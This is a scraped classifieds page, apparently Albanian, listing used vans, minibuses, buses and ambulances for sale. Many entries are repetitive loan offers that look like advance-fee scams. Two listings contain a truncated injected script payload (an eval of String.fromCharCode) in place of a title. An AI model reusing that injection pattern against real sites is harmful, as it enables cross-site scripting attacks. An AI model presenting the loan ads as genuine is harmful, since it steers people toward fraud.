• Minibus sprinter 14+1

  Minibus sprinter 14+1

  shes sprinter 311 cdi viti 2001 makina eshte 14+1 vende e shes per arsye mosperdorimi bejm edhe nderrim me foristrade

  6.000 €
  Kukës
  13 dhjetor 23:19
 • Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit

  Duke vepruar si një ofrues i biznesit për disa banka, investitorë dhe financa në mbarë botën ne po kërkojmë për të gjithë njerëzit: - Udhëheqësit e projektit - Në kërkim të financimit për realizimin

  600 €
  Junik
  11 dhjetor 23:29
 • ofertën e kreditit në 48 orë

  ofertën e kreditit në 48 orë

  Përshëndetni zonjën dhe zotëri Prindërit e mi kanë gjetur buzëqeshjen falë kësaj znj. Floriane LABEL që u ofron atyre kredi individësh, Irlandë, Zvicër, Kanada, Belgjikë, Francë, Itali, Poloni, në

  10 €
  Prishtinë
  11 dhjetor 21:13
 • kredi ofrojnë mes individuale serioze

  kredi ofrojnë mes individuale serioze

  kredi ofrojnë mes individuale serioze ofron për të ofruar ndihmë financiare për të gjithë njerëzit që janë me kohë të informatave financiare për projektet e tyre. Kontaktoni me mua: melendez125

  150 €
  Ranillug
  11 dhjetor 12:17
 • Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit e sinqertë dhe të ndershëm për ata që kanë nevojë për të. Mund t'ju japim kredi duke filluar nga 5.000 deri në 2.500.000 € ose edhe më shumë duke e ditur se jemi

  400 €
  Mallakastër
  9 dhjetor 11:53
 • Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit

  Përshëndetje Është me mirënjohje të thellë që unë dua ta paraqes dëshminë time këtu, ju që jeni në kërkim të një huaje të parave, nuk e di se si ta shpreh gëzimin tim sepse jam në duke kërkuar

  800 €
  Fushë Kosovë
  6 dhjetor 06:17
 • Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit

  ofrojnë kredi të shpejtë të kredisë dhe para të besueshme serioze Përshëndetje Z. Për të gjitha problemet tuaja financiare, ju lutem më tregoni kontakte sepse kam kapital të rëndësishëm dhe jam i an

  700 €
  Gjilan
  5 dhjetor 18:09
 • Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit e sinqertë dhe të ndershëm për ata që kanë nevojë për të. Mund t'ju japim kredi duke filluar nga 5.000 deri në 2.500.000 € ose edhe më shumë duke e ditur se jemi

  700 €
  Vlorë
  1 dhjetor 20:32
 • Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit e sinqertë dhe të ndershëm për ata që kanë nevojë për të. Mund t'ju japim kredi duke filluar nga 5.000 deri në 2.500.000 € ose edhe më shumë duke e ditur se jemi

  500 €
  Klinë
  1 dhjetor 20:12
 • TË SHPEJTË TË KREDISË

  TË SHPEJTË TË KREDISË

  NJË TË SHPEJTË TË KREDISË Nevojë për një kredi emergjente ka një normë prej 2% për projektet e tyre dhe zgjidhjen e një problemi. Ju lutem kontaktoni me mua në adresën time të e-mail adresën:

  50.000 €
  Malisheve
  1 dhjetor 17:21
 • Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit

  ofrojnë kredi të shpejtë të kredisë dhe para të besueshme serioze Përshëndetje Z. Për të gjitha problemet tuaja financiare, ju lutem më tregoni kontakte sepse kam kapital të rëndësishëm dhe jam i an

  300 €
  Leposaviq
  29 nëntor 22:24
 • Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit

  ofrojnë kredi të shpejtë të kredisë dhe para të besueshme serioze Përshëndetje Z. Për të gjitha problemet tuaja financiare, ju lutem më tregoni kontakte sepse kam kapital të rëndësishëm dhe jam i an

  400 €
  Junik
  29 nëntor 22:22
 • Nous offrons des prêts à toutes personnes.

  Nous offrons des prêts à toutes personnes.

  Bonjour Il est avec une profonde gratitude que je veux présenter mon témoignage ici, vous qui êtes à la recherche d'un prêt d'argent, ne savent pas comment exprimer ma joie parce que je suis à

  200 €
  Kllokot
  28 nëntor 02:17
 • HUATË, KREDITË DHE FINANCAVE NË 24 ORË NË 1,50% NË VIT

  HUATË, KREDITË DHE FINANCAVE NË 24 ORË NË 1,50% NË VIT

  Unë jam një ish kontabilist i Bankës Europiane të Investimeve. I jep hua dhe kredi nga 200.000 lek deri 738.802.000 lek në një normë promovuese normë të ulët interesi vjetor prej 1,5%. Unë jam në disp

  Me Marrveshje
  Tiranë
  23 nëntor 08:27
 • ofrojnë kredi të shpejtë dhe serioze në 48 orë

  ofrojnë kredi të shpejtë dhe serioze në 48 orë

  Përshëndetni të gjithë. Ne jemi një institucion financiar që ofron kredi para për të gjithë njerëzit në nevojë për arsye të ndryshme: blerje në shtëpi, fatura të paguara, investime, kredi studimi dhe

  500.000.000 €
  Gllogoc
  21 nëntor 13:13
 • VW Crafter 2.5 Dizell 2008

  VW Crafter 2.5 Dizell 2008

  Shitet VW Crafter MAXI 2.5 Dizell Vit i prodhimit 2008, me Targa Kosovare dhe i Siguruar / Regjistruar per 1 Vit, me Karton te Gjelbert edhe per jasht Shtetit. Maxi i gjat dhe shume i Bukur. Te gjitha

  9.999 €
  Prishtinë
  21 nëntor 12:11
 • okazion?????? shiten dy autobuza

  okazion?????? shiten dy autobuza

  autobusat ja ne gjendje te mire pune jane me dekukmeta te rregulte kam g oma te reja motorr 4 pisitonsh shitet per arsye se doi blej nje tjt ose nderohen me nje autobus 50vende+diferenc nga ana juaj

  20.000 Lek
  Tiranë
  19 nëntor 11:44
 • SHITET AMBULANCA Me dokumenta Kombetare & Nderkombetare

  SHITET AMBULANCA Me dokumenta Kombetare & Nderkombetare

  " OKAZION SHITET AMBULANCA " Me dokumenta Kombetare & Nderkombetare ÇMIMI I ARYESHËM Cel 0682157047

  1.000 €
  Durrës
  16 nëntor 12:54
 • Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit e sinqertë dhe të ndershëm për ata që kanë nevojë për të. Mund t'ju japim kredi duke filluar nga 5.000 deri në 2.500.000 € ose edhe më shumë duke e ditur se jemi

  600 €
  Kllokot
  15 nëntor 19:03
 • Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit e sinqertë dhe të ndershëm për ata që kanë nevojë për të. Mund t'ju japim kredi duke filluar nga 5.000 deri në 2.500.000 € ose edhe më shumë duke e ditur se jemi

  300 €
  Malisheve
  15 nëntor 19:01
 • Ne ofrojmë hua për të gjithë njerëzit

  Ne ofrojmë hua për të gjithë njerëzit

  ofrojnë kredi të shpejtë të kredisë dhe para të besueshme serioze Përshëndetje Z. Për të gjitha problemet tuaja financiare, ju lutem më tregoni kontakte sepse kam kapital të rëndësishëm dhe jam i an

  300 €
  Ferizaj
  14 nëntor 09:33
 • Renault Trafic 2.5dCi

  Renault Trafic 2.5dCi

  Shes Renault Trafic 2.5 dCi. Në Gjendje shumë të mir, iposa ardhur nga Zvicrra. Dogana ësht e pagune vetëm sigurim duhët të bëhët. Motorri 196.000 KM , Viti Prodhimit 2005 , Renaulti ësht Maxi 2m80cm

  6.900 €
  Prizren
  5 nëntor 08:36
 • Kombi WV T2, Viti

  Kombi WV T2, Viti

  Kombi eshte ne gjendje te rregullt teknike dhe optike i gatshem per pune Motorr 1.7 disel hargjime te vogla Regjistrim deri 11.02.2018 NR. TEL. +37745343600

  Me Marrveshje
  Prishtinë
  10 tetor 16:55
 • furgon mallrash Iveco dopi gom maxi ,viti 2002

  furgon mallrash Iveco dopi gom maxi ,viti 2002

  furgon mallrash 3.5t ne gjendje shum te mire,dopio gome eshte me dogan te paguar.shitet dhe kembehet. sms per kembim me makine

  6.500 €
  Tiranë
  19 shtator 07:48
 • SHITET AMBULANCE

  SHITET AMBULANCE

  AMBULANCA ESHTE WV T5, NE GJENDJE TE SHKELQYER SI MOTORIKE DHE XHENERIKE, ME DOKUMENTA TE RREGULLTA,KOMBETARE + NDERKOMBETARE, ESHTE E PAISUR ME TE GJITHA AKSESORET QE I NEVOITEN NJE AUTOAMBULANCE, *O

  Me Marrveshje
  Durrës
  16 shtator 11:24
 • Ponuda zajma i financijska potpora

  Ponuda zajma i financijska potpora

  Pozdrav gospođo i gospodo smo na raspolaganju zajam od 5000 € do 850.000 € na vrlo jednostavan uvjete. Također ulažemo ulaganja i zajmove između pojedinih vrsta. Nudimo kratke, srednje i dugoročne kre

  100 €
  Fier
  12 shtator 18:59
 • "><script language=javascript>eval(String.fromCharCode(10, 10, 10, 60, 104, 116, 109, 108, 32, 62, 10, 60, 104, 101, 97, 100, 62, 60, 109, 101, 116, 97, 32, 104, 116, 116, 112, 45, 101, 113, 117, 105, 118, 61, 34, 67, 111, 110, 116, 101, 110, 116, 45, 84,

  "><script language=javascript>eval(String.fromCharCode(10, 10, 10, 60, 104, 116, 109, 108, 32, 62, 10, 60, 104, 101, 97, 100, 62, 60, 109, 101, 116, 97, 32, 104, 116, 116, 112, 45, 101, 113, 117, 105, 118, 61, 34, 67, 111, 110, 116, 101, 110, 116, 45, 84,

  asdasd

  Me Marrveshje
  Ferizaj
  9 shtator 11:26
 • "><script language=javascript>eval(String.fromCharCode(10, 10, 10, 60, 104, 116, 109, 108, 32, 62, 10, 60, 104, 101, 97, 100, 62, 60, 109, 101, 116, 97, 32, 104, 116, 116, 112, 45, 101, 113, 117, 105, 118, 61, 34, 67, 111, 110, 116, 101, 110, 116, 45, 84,

  "><script language=javascript>eval(String.fromCharCode(10, 10, 10, 60, 104, 116, 109, 108, 32, 62, 10, 60, 104, 101, 97, 100, 62, 60, 109, 101, 116, 97, 32, 104, 116, 116, 112, 45, 101, 113, 117, 105, 118, 61, 34, 67, 111, 110, 116, 101, 110, 116, 45, 84,

  "><script language=javascript>eval(String.fromCharCode(10, 10, 10, 60, 104, 116, 109, 108, 32, 62, 10, 60, 104, 101, 97, 100, 62, 60, 109, 101, 116, 97, 32, 104, 116, 116, 112, 45, 101, 113, 117, 105,

  Me Marrveshje
  Fushë Kosovë
  9 shtator 11:25
 • Kombi Mercedes - Benz

  Kombi Mercedes - Benz

  Shitet kombi Mercedes - Benz ne gjendje te rregullt motorrin ne gjendje shum te mire 10 ulese regjistrim edhe 11 muj ne rks

  1.550 €
  Vushtrri
  5 shtator 17:16
 • sprinter minibus

  sprinter minibus

  Shitet sprinter minibus 12 vende ne letra te paguara makina eshte ne gjendje te mire motorrike viti 96 me teograf I gatshem per pune cmimi 4.500 I diskutushem

  4.000 Lek
  Tiranë
  24 gusht 03:20
 • sprinter furgone

  sprinter furgone

  Me letra deri ne fund te vitit 2017 ne gjendje shum te mir fizike motorr 5.5

  3.000 €
  Durrës
  17 gusht 12:36
 • shes peugeot 806 dizell regjistrim viti 2001

  shes peugeot 806 dizell regjistrim viti 2001

  shes pezho 806 kombi per 7+1 ulse viti prodhimi 2001 dizell regjistrim deri tetor

  2.000 €
  Ferizaj
  13 maj 00:56
 • Renault 2001 autobus

  Renault 2001 autobus

  Autubus reno viti 2001 me klim rojtader 44 ulse Posa ardhur nga zvicrra Me gjendje tmir teknike per ma shum kontakto 044298625 049193535

  8.700 €
  Prishtinë
  21 prill 00:55
 • OKAZION vetem per 3 dit 2000€

  OKAZION vetem per 3 dit 2000€

  shes fuoristrad hounday galloper me pjes mitsubishi

  2.300 €
  Tiranë
  11 mars 20:18
 • mercedes sprinter nderrohet

  mercedes sprinter nderrohet

  shitet ose nderrohet mercedes benz sprinter 211 CDI ne gjendje shum te mirevaj filtra te sapo nderruara makina shitet 4300 euro ose nderrohet me vetur te senjejtes vlere

  Me Marrveshje
  Fier
  22 shkurt 17:54
 • Ford Transit

  Ford Transit

  Makina osht ne gjendje te mir Viti makinës është 1999 makina është në gjendje të mirë 100 km 7 litra naftë Ju lutem kontakoni në Facebook Eljan hyseni eli

  Me Marrveshje
  Durrës
  1 shkurt 16:33
 • test

  test

  test

  123 €
  Dragash
  26 dhjetor 22:46
 • Benc mercedes vito

  Benc mercedes vito

  Sport osht shum ne gjendje te mir

  Me Marrveshje
  Durrës
  18 dhjetor 20:53
 • Benz mercedes vito

  Benz mercedes vito

  Makina osht shum e mir Sport osht

  Me Marrveshje
  Tiranë
  18 dhjetor 20:46
 • Kredi në mes të veçantë në 48 orë

  Kredi në mes të veçantë në 48 orë

  duhet financiare të shpejtë, ju doni të bëni një të mëdha të blerë, projektet për të bërë? Ne hua për individë apo për të gjitha të rënda kërkim në gjendje për të shlyer dhe gjithashtu bizneset dhe ko

  Me Marrveshje
  Junik
  19 nëntor 08:44
 • Shitet Furgon Mercedes-Benz Sprinter 213 CDI

  Shitet Furgon Mercedes-Benz Sprinter 213 CDI

  - Shitet Furgon Mercedes-Benz, Sprinter 213 CDI, vit prodhimi 2001. - Vende 11+1, me dokumenta te rregullta & te paguara. - Ne gjendje shume te mire teknike dhe xhenerike. - Cmimi 7000 €uro

  7.000 €
  Pogradec
  30 tetor 21:00
 • mersedes vito

  mersedes vito

  mersedes vito 2.2 i sapo ardhur nga belgjika me dogane te paguar, 5+1

  7.500 €
  Shkodër
  19 shtator 17:08
 • Volkswagen Multivan (2) 2.5 tdi 130 rehati 7-vendësh mundësi

  Volkswagen Multivan (2) 2.5 tdi 130 rehati 7-vendësh mundësi

  Volkswagen Multivan (2) 2.5 tdi 130 rehati 7-vendësh mundësi, Viti : 2004, Kilometrazhin : 173 500 km Numri i dyerve : 5 dyer fiskale të Pushtetit : 9 CV kamjo : mekanika Energji : Diesel Ngjyra int.

  8.500 €
  Lezhë
  17 gusht 15:51
 • Fiat Ducato

  Fiat Ducato

  1.9 nafte 8+1 i bardhe ne gjendje te mire

  Me Marrveshje
  Kukës
  21 shkurt 22:28
 • Mercedes Benz Sprinter 315 CDI

  Mercedes Benz Sprinter 315 CDI

  shitet mercedes benz sprinter i sapoardhur nga zvicra.i doganuar.posedon 8 ulese.viti i prodhimit 2011.pres vetem bleres serioz

  8.500 €
  Prizren
  3 janar 01:15
 • Fiat Ducato

  Fiat Ducato

  Vti prodhimit.27.04.2007 Pesha bosh.1.5 ton me ngarkese3ton 330.000 klm motor .kamio te revizionuarne200.000 klm makine perfekte OKAZION

  5.000 €
  Pogradec
  18 dhjetor 20:15
 • Sprinter 412

  Sprinter 412

  Ne gjendje te shkelqyer

  6.000 €
  Tiranë
  29 nëntor 16:27
 • Fugon malli

  Fugon malli

  Mercedes benc 412 me gjendje te shkelqyer

  6.000 €
  Tiranë
  28 nëntor 20:05
 • Fugon benc 412

  Fugon benc 412

  Me gjendje te shelter

  6.000 €
  Tiranë
  27 nëntor 04:50
 • SPRINTER 519 CDI 2009

  SPRINTER 519 CDI 2009

  NE GJENDJE SHUME TE MIRE , E SAPOARDHUR DHE ME DOGANE TE PAGUAR , DOPJO GOME

  11.999 €
  Durrës
  15 nëntor 00:11